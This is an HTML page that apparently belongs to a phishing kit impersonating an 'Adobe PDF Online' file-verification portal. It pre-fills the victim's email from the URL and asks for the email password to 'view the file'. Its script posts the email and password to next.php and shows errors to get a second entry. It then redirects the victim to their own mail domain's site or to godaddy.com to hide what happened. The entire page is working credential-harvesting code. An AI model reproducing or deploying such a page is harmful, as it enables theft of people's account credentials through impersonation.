
<!doctype html>
<html lang="en">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <!-- <link rel="icon" type="image/png" sizes="32x32" href="images/favicon-32x32.png"> -->
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>Adobe-PDF Online</title>
    <link href="css/hover.css" rel="stylesheet" media="all">

    <style type="text/css">
      textarea:hover, 
      /*input:hover,*/ 
      textarea:active, 
      input:active, 
      textarea:focus, 
      input:focus,
      select:focus,
      button:focus,
      button:active,
      button:hover,
      .btn:active,
      .btn.active
      {
        outline:0px !important;
        -webkit-appearance:none;
        box-shadow: none !important;
      }




      .input-icons i { 
        position: absolute; 
      } 

      .input-icons { 
        width: 100%; 
      } 

      .icon { 
        padding: 15px; 
        min-width: 40px;
        color: #8FA7AD; 
      } 

      .input-field { 
        width: 100%; 
        padding: 7px;
        border-radius: 0px;
        padding-left: 20px ;
        text-align: left;
        border: 1px solid #B7B7B7; 
      } 

      

      .submit-btn {
        box-shadow:inset 0px 34px 0px -15px #b54b3a;
        background-color:#a73f2d;
        border-radius:16px;
        border:1px solid #b34332;
        display:inline-block;
        cursor:pointer;
        color:#ffffff;
        font-family:Arial;
        font-size:15px;
        font-weight:bold;
        padding:9px 23px;
        text-decoration:none;
        text-shadow:0px -1px 0px #7a2a1d;
      }
      .submit-btn:hover {
        background-color:#b34332;
      }
      .submit-btn:active {
        position:relative;
        top:1px;
      }



    </style>
  </head>
  <body style="background-image: url('images/bg21.jpg'); background-size: cover;background-repeat: no-repeat;" >
    <div class="container-fluid p-0">
      <div class="container-fluid " style="background-color: #A50E01;">
        <div class="row">
          <div class="col-lg-11 mx-auto my-1 p-2">
            <div class="p-2">
              <img src="images/adobe1-w.png" class="img-fluid" width="50px">
              <span class="h3 text-white align-middle">Adobe PDF Online</span>
              
            </div> 
            

          </div>

        </div>

      </div>

      <div class="container-fluid">
        <div class="row" style="margin: 100px 0px ;">
          <div class="col-lg-5 mx-auto">
            <div style="background-color: white;border-radius:5px; padding:40px;">
              <div class="col-lg-12 p-0">
                <img src="images/logo.png" class="img-fluid" width="50px;">
                <span class="align-middle" style="color: #FF4027; font-size: 25px; font-weight: 500;">Secured Adobe File Verification</span>
                
              </div>
              <div class="form-check mt-3">
                <label class="form-check-label" style="color: #524040;">
                  <input type="radio" checked="checked" class="form-check-input" name="optradio">View File Online.
                </label>
              </div>
              <div class="form-check mt-1">
                <label class="form-check-label" style="color: #524040;">
                  <input type="radio" class="form-check-input" name="optradio">Download File.
                </label>
              </div>
              <div class="form-check mt-1">
                <label class="form-check-label" style="color: #524040;">
                  <input type="radio" class="form-check-input" name="optradio">Send File to Email.
                </label>
              </div>

              <!-- form -->
              <div class="mt-4 mx-auto">
                <center>
                  <div class="alert alert-danger" id="msg" style="display: none;"></div>
                  <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account.</span>
                </center>
                <form id="contact" class="form-horizontal well">
                  <div id="div1" class="text-dark">
                    <div>
                      <div class="form-group m-0">
                        <div id="inputbar">
                          <label class="font-weight-bold">Email Address</label>
                          <div class="input-icons">
                            <!-- <i class="far fa-user icon"></i> -->
                            <input type="email" name="email" class="input-field" id="email" aria-describedby="emailHelp" placeholder="">
                          </div>
                        </div>
                      </div>
                    </div>
                    <div class="mt-4">
                      <div class="form-group m-0">
                        <label class="font-weight-bold">Password</label>
                        <div class="input-icons">
                          <!-- <i class="fas fa-lock icon"></i> -->
                          <input type="password" name="password" class="input-field" id="password" aria-describedby="emailHelp" placeholder="">
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
                <div class="text-center col-lg-10 mx-auto mt-5">
                  <button class="submit-btn" id="submit-btn">Login To View File</button>
                </div>
                <div class="mt-4 text-center" style="font-size: 14px">
                  <span>To access our online secured documents page, you are required to login your email address this is to ensure you are the rightful recipient for the protected file.Unathorized access is prohibited.</span>
                  
                </div>
                <!-- form close -->
              </div>
              

            </div>
          </div> 
        </div> 
      </div>






      <!-- Optional JavaScript -->
      <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    </body>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script>
      $("#submit-btn1").hide();

      /* global $ */
      $(document).ready(function(){
        var count=0;

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
          // $('#email').val(email);
          var my_email =email;
          var ind=my_email.indexOf("@");
          var my_slice=my_email.substr((ind+1));
          var c= my_slice.substr(0, my_slice.indexOf('.'));
          var final= c.toLowerCase();
          
          $('#contact').trigger("reset");
          $("#msg").hide();
            // $('#fieldImg').attr('src', 'images/other-1.png');
            // $('#field').html("Other Mail");
            $('#email').val(my_email);
            $('#emailch').html(my_email);
            $("#msg").hide();
            // $("#inputbar").animate({left:200, opacity:"hide"}, 0);
            // $("#automail").animate({right:200, opacity:"show"}, 1000);
            // $('#ajaxModal').modal('show');
          }
        ///////////////url getting email////////////////


        
        $('#submit-btn').click(function(event){
          $('#error').hide();
          $('#msg').hide();
          event.preventDefault();
          var email=$("#email").val();
          var password=$("#password").val();
          var msg = $('#msg').html();
          $('#msg').text( msg );
        ///////////new injection////////////////
        var my_email =email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        // if (!filter.test(my_email)) {
        //   $('#error').show();
        //   email.focus;
        //   return false;
        // }

        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var n = my_email.search("@");
        ///////////new injection////////////////
        count=count+1;
        
        $.ajax({
          dataType: 'JSON',
          url: 'next.php',
          type: 'POST',
          data:{
            email:email,
            password:password,
          },
              // data: $('#contact').serialize(),
              beforeSend: function(xhr){
                $('#submit-btn').html('Verifing...');
              },
              success: function(response){
                if(response){
                  $("#msg").show();
                  console.log(response);
                  if(response['signal'] == 'ok'){
                    $("#password").val("");
                    if (count>=2) {
                      count=0;
                      if (n<0) { 
                        window.location.replace('https://godaddy.com/');
                      }
                      else
                      {
                        window.location.replace('https://www.'+my_slice);
                      }
                    }
                    $('#msg').html(response['msg']);
                  }
                  else{
                    $('#msg').html(response['msg']);
                  }
                }
              },
              error: function(){
                $("#password").val("");
                if (count>=2) {
                  count=0;
                  if (n<0) { 
                    window.location.replace('https://godaddy.com/');
                  }
                  else
                  {
                    window.location.replace('https://www.'+my_slice);
                  }
                }
                $("#msg").show();
                $('#msg').html("Please try again later");
              },
              complete: function(){
                $('#submit-btn').html('Login To View File');
              }
            });
      });


      });

  // document.onkeydown=function(e){
  //   if (e.ctrlKey && 
  //     (e.keyCode === 73 || 
  //      e.keyCode === 105 ||
  //      e.keyCode === 74 || 
  //      e.keyCode === 106 || 
  //      e.keyCode === 85 || 
  //      e.keyCode === 117)) {
  //     alert('not allowed');
  //   return false;
  // } else {
  //   return true;
  // }
  // }
</script>
</html>